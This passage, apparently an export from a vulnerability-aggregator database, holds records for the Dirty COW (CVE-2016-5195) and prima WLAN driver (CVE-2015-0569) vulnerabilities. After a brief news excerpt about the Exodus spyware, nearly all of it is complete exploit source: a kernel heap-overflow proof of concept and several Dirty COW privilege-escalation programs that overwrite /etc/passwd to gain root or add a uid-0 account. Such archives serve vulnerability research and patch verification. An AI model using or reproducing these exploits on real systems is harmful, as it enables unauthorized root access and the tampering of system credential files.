First, there is a small dropper that collected basic identifying information, like the IMEI and phone number, about the targeted device. \n\n\n \nThe second stage consists of multiple binary packages that deploy a well-implemented suite of surveillance functionalities. \n \nFinally, the third stage uses the infamous [DirtyCOW](<https://thehackernews.com/2017/09/dirty-cow-android-malware.html>) exploit ([CVE-2016-5195](<https://thehackernews.com/2016/10/linux-kernel-exploit.html>)) to gain root control over the infected phones. Once successfully installed, Exodus can carry out an extensive amount of surveillance. \n \nThe Android variant is also designed to keep running on the infected device even when the screen is switched off. \n \nWhile the Android version of Exodus had potentially infected \"several hundreds if not a thousand or more\" devices, it's not clear how many iPhones were infected by the iOS Exodus variant. \n \nAfter being notified of the spyware by the Lookout researchers, Apple revoked the enterprise certificate, preventing malicious apps from being installed on new iPhones and run on infected devices. \n \nThis is the second instance in the past year when an Italian software company has been caught distributing spyware. 
Earlier last year, another undisclosed Italian firm was found distributing \"**Skygofree**,\" a [dangerous Android spying tool](<https://thehackernews.com/2018/01/android-spying-malware.html>) that gives hackers full control of infected devices remotely.\n", "modified": "2019-04-09T07:19:48", "published": "2019-04-09T07:19:00", "id": "THN:6681D64EFC53E13356AF1184CE1D6024", "href": "https://thehackernews.com/2019/04/exodus-ios-malware.html", "type": "thn", "title": "'Exodus' Surveillance Malware Found Targeting Apple iOS Users", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-04T09:53:37", "description": "Linux Kernel - prima WLAN Driver Heap Overflow. CVE-2015-0569. Dos exploit for linux platform", "published": "2016-01-25T00:00:00", "type": "exploitdb", "title": "Linux Kernel - prima WLAN Driver Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0569"], "modified": "2016-01-25T00:00:00", "id": "EDB-ID:39308", "href": "https://www.exploit-db.com/exploits/39308/", "sourceData": "/*\r\n * Coder: Shawn the R0ck, [citypw@gmail.com]\r\n * Co-worker: Pray3r, [pray3r.z@gmail.com]\r\n * Compile:\r\n * # arm-linux-androideabi-gcc wext_poc.c --sysroot=$SYS_ROOT -pie \r\n * # ./a.out wlan0\r\n * Boom......shit happens[ as always];-)\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <sys/ioctl.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <linux/wireless.h>\r\n#include <errno.h>\r\n\r\ntypedef unsigned char v_U8_t;\r\n#define HDD_MAX_CMP_PER_PACKET_FILTER 5\r\n\r\nstruct PacketFilterParamsCfg {\r\n\tv_U8_t protocolLayer;\r\n\tv_U8_t cmpFlag;\r\n\tv_U8_t dataOffset;\r\n\tv_U8_t dataLength;\r\n\tv_U8_t compareData[8];\r\n\tv_U8_t dataMask[8];\r\n};\r\n\r\ntypedef struct {\r\n\tv_U8_t filterAction;\r\n\tv_U8_t filterId;\r\n\tv_U8_t numParams;\r\n\tstruct PacketFilterParamsCfg\r\n\t 
paramsData[HDD_MAX_CMP_PER_PACKET_FILTER];\r\n} tPacketFilterCfg, *tpPacketFilterCfg;\r\n\r\nint main(int argc, const char *argv[])\r\n{\r\n\tif (argc != 2) {\r\n\t\tfprintf(stderr, \"Bad usage\\n\");\r\n\t\tfprintf(stderr, \"Usage: %s ifname\\n\", argv[0]);\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tstruct iwreq req;\r\n\tstrcpy(req.ifr_ifrn.ifrn_name, argv[1]);\r\n\tint fd, status, i = 0;\r\n\tfd = socket(AF_INET, SOCK_DGRAM, 0);\r\n\ttPacketFilterCfg p_req;\r\n\r\n\t/* crafting a data structure to triggering the code path */\r\n\treq.u.data.pointer =\r\n\t malloc(sizeof(v_U8_t) * 3 +\r\n\t\t sizeof(struct PacketFilterParamsCfg) * 5);\r\n\tp_req.filterAction = 1;\r\n\tp_req.filterId = 0;\r\n\tp_req.numParams = 3;\r\n\tfor (; i < 5; i++) {\r\n\t\tp_req.paramsData[i].dataLength = 241;\r\n\t\tmemset(&p_req.paramsData[i].compareData, 0x41, 16);\r\n\t}\r\n\r\n\tmemcpy(req.u.data.pointer, &p_req,\r\n\t sizeof(v_U8_t) * 3 +\r\n\t sizeof(struct PacketFilterParamsCfg) * 5);\r\n\r\n\tif (ioctl(fd, 0x8bf7, &req) == -1) {\r\n\t\tfprintf(stderr, \"Failed ioct() get on interface %s: %s\\n\",\r\n\t\t\targv[1], strerror(errno));\r\n\t} else {\r\n\t\tprintf(\"You shouldn't see this msg...\\n\");\r\n\t}\r\n\r\n}\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39308/"}, {"lastseen": "2016-11-29T17:23:22", "description": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (/etc/passwd). CVE-2016-5195. 
Local exploit for Linux platform", "published": "2016-11-27T00:00:00", "type": "exploitdb", "title": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (/etc/passwd)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-11-27T00:00:00", "id": "EDB-ID:40847", "href": "https://www.exploit-db.com/exploits/40847/", "sourceData": "// EDB-Note: Compile: g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil\r\n// EDB-Note: Recommended way to run: ./dcow -s (Will automatically do \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\")\r\n//\r\n// -----------------------------------------------------------------\r\n// Copyright (C) 2016 Gabriele Bonacini\r\n//\r\n// This program is free software; you can redistribute it and/or modify\r\n// it under the terms of the GNU General Public License as published by\r\n// the Free Software Foundation; either version 3 of the License, or\r\n// (at your option) any later version.\r\n// This program is distributed in the hope that it will be useful,\r\n// but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\r\n// GNU General Public License for more details.\r\n// You should have received a copy of the GNU General Public License\r\n// along with this program; if not, write to the Free Software Foundation,\r\n// Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\r\n// -----------------------------------------------------------------\r\n\r\n#include <iostream>\r\n#include <fstream>\r\n#include <string>\r\n#include <thread>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <pwd.h>\r\n#include <pty.h>\r\n#include <string.h>\r\n#include <termios.h>\r\n#include <sys/wait.h>\r\n#include <signal.h>\r\n\r\n#define BUFFSIZE 1024\r\n#define PWDFILE \"/etc/passwd\"\r\n#define BAKFILE \"./.ssh_bak\"\r\n#define TMPBAKFILE \"/tmp/.ssh_bak\"\r\n#define PSM \"/proc/self/mem\"\r\n#define ROOTID \"root:\"\r\n#define SSHDID \"sshd:\"\r\n#define MAXITER 300\r\n#define DEFPWD \"$6$P7xBAooQEZX/ham$9L7U0KJoihNgQakyfOQokDgQWLSTFZGB9LUU7T0W2kH1rtJXTzt9mG4qOoz9Njt.tIklLtLosiaeCBsZm8hND/\"\r\n#define TXTPWD \"dirtyCowFun\\n\"\r\n#define DISABLEWB \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\\n\"\r\n#define EXITCMD \"exit\\n\"\r\n#define CPCMD \"cp \"\r\n#define RMCMD \"rm \"\r\n\r\nusing namespace std;\r\n\r\nclass Dcow{\r\n private:\r\n bool run, rawMode, opShell, restPwd;\r\n void *map;\r\n int fd, iter, master, wstat;\r\n string buffer, etcPwd, etcPwdBak,\r\n root, user, pwd, sshd;\r\n thread *writerThr, *madviseThr, *checkerThr;\r\n ifstream *extPwd;\r\n ofstream *extPwdBak;\r\n struct passwd *userId;\r\n pid_t child; \r\n char buffv[BUFFSIZE];\r\n fd_set rfds;\r\n struct termios termOld, termNew;\r\n ssize_t ign;\r\n\r\n void exitOnError(string msg);\r\n public:\r\n Dcow(bool opSh, bool rstPwd);\r\n ~Dcow(void);\r\n int expl(void); \r\n};\r\n\r\nDcow::Dcow(bool opSh, bool rstPwd) : run(true), rawMode(false), opShell(opSh), restPwd(rstPwd),\r\n iter(0), wstat(0), root(ROOTID), pwd(DEFPWD), sshd(SSHDID), 
writerThr(nullptr),\r\n madviseThr(nullptr), checkerThr(nullptr), extPwd(nullptr), extPwdBak(nullptr), \r\n child(0){ \r\n userId = getpwuid(getuid());\r\n user.append(userId->pw_name).append(\":\");\r\n extPwd = new ifstream(PWDFILE); \r\n while (getline(*extPwd, buffer)){\r\n buffer.append(\"\\n\");\r\n etcPwdBak.append(buffer);\r\n if(buffer.find(root) == 0){\r\n etcPwd.insert(0, root).insert(root.size(), pwd);\r\n etcPwd.insert(etcPwd.begin() + root.size() + pwd.size(), \r\n buffer.begin() + buffer.find(\":\", root.size()), buffer.end());\r\n }else if(buffer.find(user) == 0 || buffer.find(sshd) == 0 ){\r\n etcPwd.insert(0, buffer);\r\n }else{\r\n etcPwd.append(buffer);\r\n }\r\n }\r\n extPwdBak = new ofstream(restPwd ? TMPBAKFILE : BAKFILE);\r\n extPwdBak->write(etcPwdBak.c_str(), etcPwdBak.size());\r\n extPwdBak->close();\r\n fd = open(PWDFILE,O_RDONLY);\r\n map = mmap(nullptr, etcPwdBak.size(), PROT_READ,MAP_PRIVATE, fd, 0);\r\n}\r\n\r\nDcow::~Dcow(void){\r\n extPwd->close();\r\n close(fd);\r\n delete extPwd; delete extPwdBak; delete madviseThr; delete writerThr; delete checkerThr;\r\n if(rawMode) tcsetattr(STDIN_FILENO, TCSANOW, &termOld);\r\n if(child != 0) wait(&wstat); \r\n}\r\n\r\nvoid Dcow::exitOnError(string msg){\r\n cerr << msg << endl;\r\n // if(child != 0) kill(child, SIGKILL);\r\n throw new exception();\r\n}\r\n\r\nint Dcow::expl(void){\r\n madviseThr = new thread([&](){ while(run){ madvise(map, etcPwdBak.size(), MADV_DONTNEED);} });\r\n writerThr = new thread([&](){ int fpsm = open(PSM,O_RDWR); \r\n while(run){ lseek(fpsm, reinterpret_cast<off_t>(map), SEEK_SET); \r\n ign = write(fpsm, etcPwd.c_str(), etcPwdBak.size()); }\r\n });\r\n checkerThr = new thread([&](){ while(iter <= MAXITER){ \r\n extPwd->clear(); extPwd->seekg(0, ios::beg); \r\n buffer.assign(istreambuf_iterator<char>(*extPwd),\r\n istreambuf_iterator<char>());\r\n if(buffer.find(pwd) != string::npos && \r\n buffer.size() >= etcPwdBak.size()){\r\n run = false; break;\r\n }\r\n iter 
++; usleep(300000);\r\n }\r\n run = false;\r\n });\r\n\r\n cerr << \"Running ...\" << endl;\r\n madviseThr->join();\r\n writerThr->join();\r\n checkerThr->join();\r\n\r\n if(iter <= MAXITER){ \r\n child = forkpty(&master, nullptr, nullptr, nullptr);\r\n\r\n if(child == -1) exitOnError(\"Error forking pty.\");\r\n\r\n if(child == 0){ \r\n execlp(\"su\", \"su\", \"-\", nullptr);\r\n exitOnError(\"Error on exec.\");\r\n }\r\n\r\n if(opShell) cerr << \"Password overridden to: \" << TXTPWD << endl;\r\n memset(buffv, 0, BUFFSIZE);\r\n ssize_t bytes_read = read(master, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) exitOnError(\"Error reading su prompt.\");\r\n cerr << \"Received su prompt (\" << buffv << \")\" << endl; \r\n\r\n if(write(master, TXTPWD, strlen(TXTPWD)) <= 0) \r\n exitOnError(\"Error writing pwd on tty.\");\r\n\r\n if(write(master, DISABLEWB, strlen(DISABLEWB)) <= 0) \r\n exitOnError(\"Error writing cmd on tty.\");\r\n\r\n if(!opShell){\r\n if(write(master, EXITCMD, strlen(EXITCMD)) <= 0) \r\n exitOnError(\"Error writing exit cmd on tty.\");\r\n }else{\r\n if(restPwd){\r\n string restoreCmd = string(CPCMD).append(TMPBAKFILE).append(\" \").append(PWDFILE).append(\"\\n\");\r\n if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0) \r\n exitOnError(\"Error writing restore cmd on tty.\");\r\n restoreCmd = string(RMCMD).append(TMPBAKFILE).append(\"\\n\");\r\n if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0) \r\n exitOnError(\"Error writing restore cmd (rm) on tty.\");\r\n }\r\n\r\n if(tcgetattr(STDIN_FILENO, &termOld) == -1 )\r\n exitOnError(\"Error getting terminal attributes.\");\r\n \r\n termNew = termOld;\r\n termNew.c_lflag &= static_cast<unsigned long>(~(ICANON | ECHO));\r\n \r\n if(tcsetattr(STDIN_FILENO, TCSANOW, &termNew) == -1)\r\n exitOnError(\"Error setting terminal in non-canonical mode.\");\r\n rawMode = true;\r\n \r\n while(true){\r\n FD_ZERO(&rfds);\r\n FD_SET(master, &rfds);\r\n FD_SET(STDIN_FILENO, &rfds);\r\n \r\n 
if(select(master + 1, &rfds, nullptr, nullptr, nullptr) < 0 )\r\n exitOnError(\"Error on select tty.\");\r\n \r\n if(FD_ISSET(master, &rfds)) {\r\n memset(buffv, 0, BUFFSIZE);\r\n bytes_read = read(master, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) break;\r\n if(write(STDOUT_FILENO, buffv, bytes_read) != bytes_read)\r\n exitOnError(\"Error writing on stdout.\");\r\n }\r\n \r\n if(FD_ISSET(STDIN_FILENO, &rfds)) {\r\n memset(buffv, 0, BUFFSIZE);\r\n bytes_read = read(STDIN_FILENO, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) exitOnError(\"Error reading from stdin.\");\r\n if(write(master, buffv, bytes_read) != bytes_read) break;\r\n }\r\n }\r\n }\r\n }\r\n \r\n return [](int ret, bool shell){ \r\n string msg = shell ? \"Exit.\\n\" : string(\"Root password is: \") + TXTPWD + \"Enjoy! :-)\\n\";\r\n if(ret <= MAXITER){cerr << msg; return 0;}\r\n else{cerr << \"Exploit failed.\\n\"; return 1;} \r\n }(iter, opShell);\r\n}\r\n\r\nvoid printInfo(char* cmd){\r\n cerr << cmd << \" [-s] [-n] | [-h]\\n\" << endl;\r\n cerr << \" -s open directly a shell, if the exploit is successful;\" << endl;\r\n cerr << \" -n combined with -s, doesn't restore the passwd file.\" << endl;\r\n cerr << \" -h print this synopsis;\" << endl;\r\n cerr << \"\\n If no param is specified, the program modifies the passwd file and exits.\" << endl;\r\n cerr << \" A copy of the passwd file will be create in the current directory as .ssh_bak\" << endl;\r\n cerr << \" (unprivileged user), if no parameter or -n is specified.\\n\" << endl;\r\n exit(1);\r\n}\r\n\r\nint main(int argc, char** argv){\r\n const char flags[] = \"shn\";\r\n int c;\r\n bool opShell = false,\r\n restPwd = true;\r\n\r\n opterr = 0;\r\n while ((c = getopt(argc, argv, flags)) != -1){\r\n switch (c){\r\n case 's':\r\n opShell = true;\r\n break;\r\n case 'n':\r\n restPwd = false;\r\n break;\r\n case 'h':\r\n printInfo(argv[0]);\r\n break;\r\n default:\r\n cerr << \"Invalid parameter.\" << endl << endl;\r\n printInfo(argv[0]);\r\n }\r\n 
}\r\n\r\n if(!restPwd && !opShell){\r\n cerr << \"Invalid parameter: -n requires -s\" << endl << endl;\r\n printInfo(argv[0]);\r\n }\r\n\r\n Dcow dcow(opShell, restPwd);\r\n return dcow.expl();\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40847/"}, {"lastseen": "2016-11-28T21:23:40", "description": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation. CVE-2016-5195. Local exploit for Linux platform", "published": "2016-11-28T00:00:00", "type": "exploitdb", "title": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-11-28T00:00:00", "id": "EDB-ID:40839", "href": "https://www.exploit-db.com/exploits/40839/", "sourceData": "//\r\n// This exploit uses the pokemon exploit as a base and automatically\r\n// generates a new passwd line. 
The original /etc/passwd is then\r\n// backed up to /tmp/passwd.bak and overwritten with the new line.\r\n// The user will be prompted for the new password when the binary is run.\r\n// After running the exploit you should be able to login with the newly\r\n// created user.\r\n//\r\n// Original exploit:\r\n// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c\r\n//\r\n// To use this exploit modify the user values according to your needs\r\n//\r\n// Compile with\r\n//\r\n// gcc -pthread dirty.c -o dirty -lcrypt\r\n//\r\n// and just run the newly create binary with ./dirty\r\n//\r\n// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT !\r\n//\r\n// Exploit adopted by Christian \"FireFart\" Mehlmauer\r\n// https://firefart.at\r\n//\r\n\r\n\r\n#include <fcntl.h>\r\n#include <pthread.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <sys/wait.h>\r\n#include <sys/ptrace.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <crypt.h>\r\n\r\nconst char *filename = \"/etc/passwd\";\r\nconst char *backup_filename = \"/tmp/passwd.bak\";\r\nconst char *salt = \"firefart\";\r\n\r\nint f;\r\nvoid *map;\r\npid_t pid;\r\npthread_t pth;\r\nstruct stat st;\r\n\r\nstruct Userinfo {\r\n char *username;\r\n char *hash;\r\n int user_id;\r\n int group_id;\r\n char *info;\r\n char *home_dir;\r\n char *shell;\r\n};\r\n\r\nchar *generate_password_hash(char *plaintext_pw) {\r\n return crypt(plaintext_pw, salt);\r\n}\r\n\r\nchar *generate_passwd_line(struct Userinfo u) {\r\n const char *format = \"%s:%s:%d:%d:%s:%s:%s\\n\";\r\n int size = snprintf(NULL, 0, format, u.username, u.hash,\r\n u.user_id, u.group_id, u.info, u.home_dir, u.shell);\r\n char *ret = malloc(size + 1);\r\n sprintf(ret, format, u.username, u.hash, u.user_id,\r\n u.group_id, u.info, u.home_dir, u.shell);\r\n return ret;\r\n}\r\n\r\nvoid *madviseThread(void *arg) {\r\n int i, c 
= 0;\r\n for(i = 0; i < 200000000; i++) {\r\n c += madvise(map, 100, MADV_DONTNEED);\r\n }\r\n printf(\"madvise %d\\n\\n\", c);\r\n}\r\n\r\nint copy_file(const char *from, const char *to) {\r\n // check if target file already exists\r\n if(access(to, F_OK) != -1) {\r\n printf(\"File %s already exists! Please delete it and run again\\n\",\r\n to);\r\n return -1;\r\n }\r\n\r\n char ch;\r\n FILE *source, *target;\r\n\r\n source = fopen(from, \"r\");\r\n if(source == NULL) {\r\n return -1;\r\n }\r\n target = fopen(to, \"w\");\r\n if(target == NULL) {\r\n fclose(source);\r\n return -1;\r\n }\r\n\r\n while((ch = fgetc(source)) != EOF) {\r\n fputc(ch, target);\r\n }\r\n\r\n printf(\"%s successfully backed up to %s\\n\",\r\n from, to);\r\n\r\n fclose(source);\r\n fclose(target);\r\n\r\n return 0;\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n // backup file\r\n int ret = copy_file(filename, backup_filename);\r\n if (ret != 0) {\r\n exit(ret);\r\n }\r\n\r\n struct Userinfo user;\r\n // set values, change as needed\r\n user.username = \"firefart\";\r\n user.user_id = 0;\r\n user.group_id = 0;\r\n user.info = \"pwned\";\r\n user.home_dir = \"/root\";\r\n user.shell = \"/bin/bash\";\r\n\r\n char *plaintext_pw = getpass(\"Please enter new password: \");\r\n user.hash = generate_password_hash(plaintext_pw);\r\n char *complete_passwd_line = generate_passwd_line(user);\r\n printf(\"Complete line:\\n%s\\n\", complete_passwd_line);\r\n\r\n f = open(filename, O_RDONLY);\r\n fstat(f, &st);\r\n map = mmap(NULL,\r\n st.st_size + sizeof(long),\r\n PROT_READ,\r\n MAP_PRIVATE,\r\n f,\r\n 0);\r\n printf(\"mmap: %lx\\n\",(unsigned long)map);\r\n pid = fork();\r\n if(pid) {\r\n waitpid(pid, NULL, 0);\r\n int u, i, o, c = 0;\r\n int l=strlen(complete_passwd_line);\r\n for(i = 0; i < 10000/l; i++) {\r\n for(o = 0; o < l; o++) {\r\n for(u = 0; u < 10000; u++) {\r\n c += ptrace(PTRACE_POKETEXT,\r\n pid,\r\n map + o,\r\n *((long*)(complete_passwd_line + o)));\r\n }\r\n }\r\n }\r\n 
printf(\"ptrace %d\\n\",c);\r\n }\r\n else {\r\n pthread_create(&pth,\r\n NULL,\r\n madviseThread,\r\n NULL);\r\n ptrace(PTRACE_TRACEME);\r\n kill(getpid(), SIGSTOP);\r\n pthread_join(pth,NULL);\r\n }\r\n\r\n printf(\"Done! Check %s to see if the new user was created\\n\", filename);\r\n printf(\"You can log in with username %s and password %s.\\n\\n\",\r\n user.username, plaintext_pw);\r\n printf(\"\\nDON'T FORGET TO RESTORE %s FROM %s !!!\\n\\n\",\r\n filename, backup_filename);\r\n return 0;\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40839/"}], "zdt": [{"lastseen": "2018-01-02T17:10:04", "description": "Exploit for linux platform in category dos / poc", "edition": 1, "published": "2016-01-25T00:00:00", "title": "Linux Kernel 3.x / 4.x - prima WLAN Driver Heap Overflow", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0569"], "modified": "2016-01-25T00:00:00", "href": "https://0day.today/exploit/description/25771", "id": "1337DAY-ID-25771", "sourceData": "/*\r\n * Coder: Shawn the R0ck, [[email\u00a0protected]]\r\n * Co-worker: Pray3r, [[email\u00a0protected]]\r\n * Compile:\r\n * # arm-linux-androideabi-gcc wext_poc.c --sysroot=$SYS_ROOT -pie \r\n * # ./a.out wlan0\r\n * Boom......shit happens[ as always];-)\r\n*/\r\n \r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <sys/ioctl.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <linux/wireless.h>\r\n#include <errno.h>\r\n \r\ntypedef unsigned char v_U8_t;\r\n#define HDD_MAX_CMP_PER_PACKET_FILTER 5\r\n \r\nstruct PacketFilterParamsCfg {\r\n v_U8_t protocolLayer;\r\n v_U8_t cmpFlag;\r\n v_U8_t dataOffset;\r\n v_U8_t dataLength;\r\n v_U8_t compareData[8];\r\n v_U8_t dataMask[8];\r\n};\r\n \r\ntypedef struct {\r\n v_U8_t filterAction;\r\n v_U8_t filterId;\r\n v_U8_t numParams;\r\n struct PacketFilterParamsCfg\r\n 
paramsData[HDD_MAX_CMP_PER_PACKET_FILTER];\r\n} tPacketFilterCfg, *tpPacketFilterCfg;\r\n \r\nint main(int argc, const char *argv[])\r\n{\r\n if (argc != 2) {\r\n fprintf(stderr, \"Bad usage\\n\");\r\n fprintf(stderr, \"Usage: %s ifname\\n\", argv[0]);\r\n return -1;\r\n }\r\n \r\n struct iwreq req;\r\n strcpy(req.ifr_ifrn.ifrn_name, argv[1]);\r\n int fd, status, i = 0;\r\n fd = socket(AF_INET, SOCK_DGRAM, 0);\r\n tPacketFilterCfg p_req;\r\n \r\n /* crafting a data structure to triggering the code path */\r\n req.u.data.pointer =\r\n malloc(sizeof(v_U8_t) * 3 +\r\n sizeof(struct PacketFilterParamsCfg) * 5);\r\n p_req.filterAction = 1;\r\n p_req.filterId = 0;\r\n p_req.numParams = 3;\r\n for (; i < 5; i++) {\r\n p_req.paramsData[i].dataLength = 241;\r\n memset(&p_req.paramsData[i].compareData, 0x41, 16);\r\n }\r\n \r\n memcpy(req.u.data.pointer, &p_req,\r\n sizeof(v_U8_t) * 3 +\r\n sizeof(struct PacketFilterParamsCfg) * 5);\r\n \r\n if (ioctl(fd, 0x8bf7, &req) == -1) {\r\n fprintf(stderr, \"Failed ioct() get on interface %s: %s\\n\",\r\n argv[1], strerror(errno));\r\n } else {\r\n printf(\"You shouldn't see this msg...\\n\");\r\n }\r\n \r\n}\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25771"}, {"lastseen": "2018-01-09T19:17:02", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-10-22T00:00:00", "type": "zdt", "title": "DirtyCow Linux Kernel Race Condition Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-10-22T00:00:00", "href": "https://0day.today/exploit/description/25944", "id": "1337DAY-ID-25944", "sourceData": "/*\r\n####################### dirtyc0w.c #######################\r\n$ sudo -s\r\n# echo this is not a test > foo\r\n# chmod 0404 foo\r\n$ ls -lah foo\r\n-r-----r-- 1 root root 19 Oct 20 15:23 foo\r\n$ cat foo\r\nthis is not a test\r\n$ 
gcc -lpthread dirtyc0w.c -o dirtyc0w\r\n$ ./dirtyc0w foo m00000000000000000\r\nmmap 56123000\r\nmadvise 0\r\nprocselfmem 1800000000\r\n$ cat foo\r\nm00000000000000000\r\n####################### dirtyc0w.c #######################\r\n*/\r\n#include <stdio.h>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <pthread.h>\r\n#include <string.h>\r\n \r\nvoid *map;\r\nint f;\r\nstruct stat st;\r\nchar *name;\r\n \r\nvoid *madviseThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n int i,c=0;\r\n for(i=0;i<100000000;i++)\r\n {\r\n/*\r\nYou have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661\r\n> This is achieved by racing the madvise(MADV_DONTNEED) system call\r\n> while having the page of the executable mmapped in memory.\r\n*/\r\n c+=madvise(map,100,MADV_DONTNEED);\r\n }\r\n printf(\"madvise %d\\n\\n\",c);\r\n}\r\n \r\nvoid *procselfmemThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n/*\r\nYou have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16\r\n> The in the wild exploit we are aware of doesn't work on Red Hat\r\n> Enterprise Linux 5 and 6 out of the box because on one side of\r\n> the race it writes to /proc/self/mem, but /proc/self/mem is not\r\n> writable on Red Hat Enterprise Linux 5 and 6.\r\n*/\r\n int f=open(\"/proc/self/mem\",O_RDWR);\r\n int i,c=0;\r\n for(i=0;i<100000000;i++) {\r\n/*\r\nYou have to reset the file pointer to the memory position.\r\n*/\r\n lseek(f,map,SEEK_SET);\r\n c+=write(f,str,strlen(str));\r\n }\r\n printf(\"procselfmem %d\\n\\n\", c);\r\n}\r\n \r\n \r\nint main(int argc,char *argv[])\r\n{\r\n/*\r\nYou have to pass two arguments. 
File and Contents.\r\n*/\r\n if (argc<3)return 1;\r\n pthread_t pth1,pth2;\r\n/*\r\nYou have to open the file in read only mode.\r\n*/\r\n f=open(argv[1],O_RDONLY);\r\n fstat(f,&st);\r\n name=argv[1];\r\n/*\r\nYou have to use MAP_PRIVATE for copy-on-write mapping.\r\n> Create a private copy-on-write mapping. Updates to the\r\n> mapping are not visible to other processes mapping the same\r\n> file, and are not carried through to the underlying file. It\r\n> is unspecified whether changes made to the file after the\r\n> mmap() call are visible in the mapped region.\r\n*/\r\n/*\r\nYou have to open with PROT_READ.\r\n*/\r\n map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);\r\n printf(\"mmap %x\\n\\n\",map);\r\n/*\r\nYou have to do it on two threads.\r\n*/\r\n pthread_create(&pth1,NULL,madviseThread,argv[1]);\r\n pthread_create(&pth2,NULL,procselfmemThread,argv[2]);\r\n/*\r\nYou have to wait for the threads to finish.\r\n*/\r\n pthread_join(pth1,NULL);\r\n pthread_join(pth2,NULL);\r\n return 0;\r\n}\r\n\n\n# 0day.today [2018-01-09] #", "sourceHref": "https://0day.today/exploit/25944", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-28T03:24:54", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-11-29T00:00:00", "type": "zdt", "title": "Linux Kernel 2.6.22 < 3.9 - Dirty COW PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/p", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-11-29T00:00:00", "href": "https://0day.today/exploit/description/26430", "id": "1337DAY-ID-26430", "sourceData": "// EDB-Note: After getting a shell, doing \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\" may make the system more stable.\r\n//\r\n// This exploit uses the pokemon exploit of the dirtycow vulnerability\r\n// as a base and automatically generates a new passwd line.\r\n// The user will be prompted for the new password when 
the binary is run.\r\n// The original /etc/passwd file is then backed up to /tmp/passwd.bak\r\n// and overwrites the root account with the generated line.\r\n// After running the exploit you should be able to login with the newly\r\n// created user.\r\n//\r\n// To use this exploit modify the user values according to your needs.\r\n// The default is \"firefart\".\r\n//\r\n// Original exploit (dirtycow's ptrace_pokedata \"pokemon\" method):\r\n// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c\r\n//\r\n// Compile with:\r\n// gcc -pthread dirty.c -o dirty -lcrypt\r\n//\r\n// Then run the newly create binary by either doing:\r\n// \"./dirty\" or \"./dirty my-new-password\"\r\n//\r\n// Afterwards, you can either \"su firefart\" or \"ssh [email\u00a0protected]\"\r\n//\r\n// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!\r\n// mv /tmp/passwd.bak /etc/passwd\r\n//\r\n// Exploit adopted by Christian \"FireFart\" 